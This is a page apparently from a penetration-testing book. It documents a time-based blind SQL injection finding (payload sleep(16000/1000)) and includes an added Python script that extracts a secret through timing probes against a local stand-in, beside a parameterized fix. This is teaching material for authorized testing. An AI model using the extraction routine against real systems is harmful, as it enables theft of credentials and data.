Page 104 - Hands-On Bug Hunting for Penetration Testers
SQL, Code Injection, and Scanners Chapter 5
URL
The vulnerability's URL is provided clearly in the Arachni report:
http://webscantest.com/datastore/search_by_id.php
Payload
The SQLi payload is listed prominently in both the console and HTML reports under
injected seed:
sleep(16000/1000);
Methodology
Again, only use a scanner if you're authorized to! We would report this finding as coming
from version of Arachni.
Instructions to Reproduce
Rather than simply pointing to Arachni, we want to list the steps to manually recreate the
vulnerability we're reporting. In this case, that will be navigating to the form on the affected
page, entering the payload, and hitting Submit. There's no encoding, DOM manipulation,
or other tricks required.
Attack Scenario
When a SQL database suffers from a time-based injection attack, that vulnerability allows
an attacker to enumerate information in the database even though the page never displays
query results: the attacker wraps a guess in a conditional expression that triggers the
SQLi-induced pause only when the guess is correct, and reads the answer from the response
time. Repeated over many requests, that yes/no channel is enough to exfiltrate business or
payment data, sensitive tokens/authentication credentials, or any number of other critical
pieces of information.
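To make both the reproduction steps and the attack scenario concrete, here is an added Python example. It is not code from the book or from Arachni: it stands in for search_by_id.php with an in-memory SQLite database and a registered sleep() function that imitates MySQL's, then (a) reproduces the scanner's timing check with the sleep(16000/1000) seed and (b) extracts a constructed secret one character at a time from the delay alone, with a parameterized version of the query beside the vulnerable one. The table and column names, the admin token, the 1 AND ... payload shape and the sleep scaling are all assumptions of the example, not details from the report.

```python
import sqlite3
import time

# Constructed stand-in for the vulnerable endpoint: an in-memory SQLite database
# with a MySQL-style sleep() registered as a user-defined function. To keep the
# example fast, one "second" requested by a payload costs SLEEP_SCALE real
# seconds; the timing logic is the same as against a real MySQL backend.
SLEEP_SCALE = 0.01


def _sleep(seconds):
    time.sleep(float(seconds) * SLEEP_SCALE)
    return 0  # MySQL's sleep() also returns 0


def make_app(vulnerable=True):
    """Return a search_by_id(user_input) -> list-of-names callable.

    vulnerable=True concatenates the id into the SQL (the flaw the report
    describes); vulnerable=False binds it as a query parameter instead.
    """
    conn = sqlite3.connect(":memory:")
    conn.create_function("sleep", 1, _sleep)
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT);
        INSERT INTO products VALUES (1, 'widget');
        CREATE TABLE users (username TEXT, api_token TEXT);
        INSERT INTO users VALUES ('admin', 's3cr3t');  -- constructed secret
    """)

    def search_by_id(user_input):
        try:
            if vulnerable:
                rows = conn.execute("SELECT name FROM products WHERE id = " + user_input)
            else:
                rows = conn.execute("SELECT name FROM products WHERE id = ?", (user_input,))
            return [r[0] for r in rows]
        except sqlite3.Error:
            return []  # the page shows nothing useful either way: the attack is blind

    return search_by_id


def elapsed(send, payload):
    """Seconds one request takes; this is the only signal a blind attacker gets."""
    t0 = time.perf_counter()
    send(payload)
    return time.perf_counter() - t0


def is_delayed(send, payload, baseline, seconds):
    """True if the request ran at least half the injected sleep longer than baseline."""
    return elapsed(send, payload) - baseline >= 0.5 * seconds * SLEEP_SCALE


def confirm_time_based_sqli(send, seconds=16):
    """Reproduce the scanner's check: the seed sleep(16000/1000) should stall the response."""
    baseline = elapsed(send, "1")
    return is_delayed(send, f"1 AND sleep({seconds * 1000}/1000)", baseline, seconds)


def extract_via_timing(send, expr, max_len=32, seconds=5):
    """Read the string value of SQL expression `expr` one character at a time.

    Every probe asks a yes/no question ("is character N's code point above mid?")
    and the backend answers it as sleep-or-not, so about seven probes recover a
    printable ASCII byte. Extraction stops when `expr` has no more characters.
    """
    baseline = elapsed(send, "1")
    out = ""
    for pos in range(1, max_len + 1):
        more = f"1 AND CASE WHEN length({expr}) >= {pos} THEN sleep({seconds}) ELSE 0 END"
        if not is_delayed(send, more, baseline, seconds):
            break
        lo, hi = 32, 126  # binary search over printable ASCII
        while lo < hi:
            mid = (lo + hi) // 2
            probe = (f"1 AND CASE WHEN unicode(substr({expr},{pos},1)) > {mid} "
                     f"THEN sleep({seconds}) ELSE 0 END")
            if is_delayed(send, probe, baseline, seconds):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    vuln, fixed = make_app(vulnerable=True), make_app(vulnerable=False)
    print("vulnerable app stalls on the seed:", confirm_time_based_sqli(vuln))
    print("parameterized app stalls on the seed:", confirm_time_based_sqli(fixed))
    token_expr = "(SELECT api_token FROM users WHERE username='admin')"
    print("admin token recovered from timing alone:", extract_via_timing(vuln, token_expr))
```

Against the parameterized query the whole payload is compared with the id column as a string, so sleep() never runs and the timing check stays negative; that is the single control the finding's remediation should point to. On a real target, measure the baseline several times and treat network jitter as noise: a threshold at half the injected delay, as used here, is comfortable for a 16-second seed but far too tight for sub-second sleeps.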
Final Report
Let's use this information to format our submission:
CATEGORY: Blind SQLi (time-based)
TIME: 2018-06-18 3:23 AM (3:23) UTC